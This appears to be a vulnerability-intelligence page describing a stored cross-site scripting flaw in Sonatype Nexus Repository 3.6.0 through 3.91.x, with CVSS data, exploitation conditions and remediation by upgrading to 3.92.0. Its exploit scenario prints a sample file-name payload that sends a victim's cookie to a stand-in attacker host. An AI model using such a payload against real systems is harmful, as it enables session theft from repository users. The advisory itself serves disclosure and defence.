EUVD-2026-29179
GHSA-f5g6-q897-4w8f
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
An authenticated user with upload permission to a hosted repository can store content that causes arbitrary JavaScript to execute in the browser of any user who browses that repository directory via the HTML index page in Sonatype Nexus Repository versions 3.6.0 through versions before 3.92.0. This could allow the attacker to perform actions in the context of the victim's session.
AnalysisAI
Stored cross-site scripting (XSS) in Sonatype Nexus Repository 3.6.0 through 3.91.x allows authenticated users with upload permissions to inject malicious JavaScript into repository content, which executes in the browsers of any user viewing the affected repository directory via the HTML index page. An attacker can perform unauthorized actions within a victim's session context, including potential data theft or privilege escalation depending on the victim's role. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the following specific conditions: (1) the attacker must be an authenticated user with upload permissions to a hosted repository in Nexus Repository versions 3.6.0 through 3.91.x; (2) the victim must browse the repository directory using the web UI's HTML index page feature (not via API or command-line tools); (3) the victim's browser must execute JavaScript (no protection from browser security policies or user agent modifications). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS v4.0 score of 5.1 with vector AV:N/AC:L/AT:N/PR:L/UI:P reflects a medium-severity vulnerability with network attack vector, low attack complexity, and low privilege requirements (authenticated user with upload permission). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with legitimate upload permissions to a Nexus Repository (e.g., a disgruntled developer, compromised CI/CD pipeline account, or malicious third-party contributor) uploads a file with a name containing JavaScript payload, such as '"><script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script><a href="' or embeds the payload in artifact metadata. When a repository administrator or another developer browses the repository directory via the web UI to review or manage content, the HTML index page renders the malicious script, which executes in their browser with their session privileges. … |
| Remediation | Upgrade Sonatype Nexus Repository to version 3.92.0 or later, which includes the security patch for this XSS vulnerability. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Share
External POC / Exploit Code
Leaving vuln.today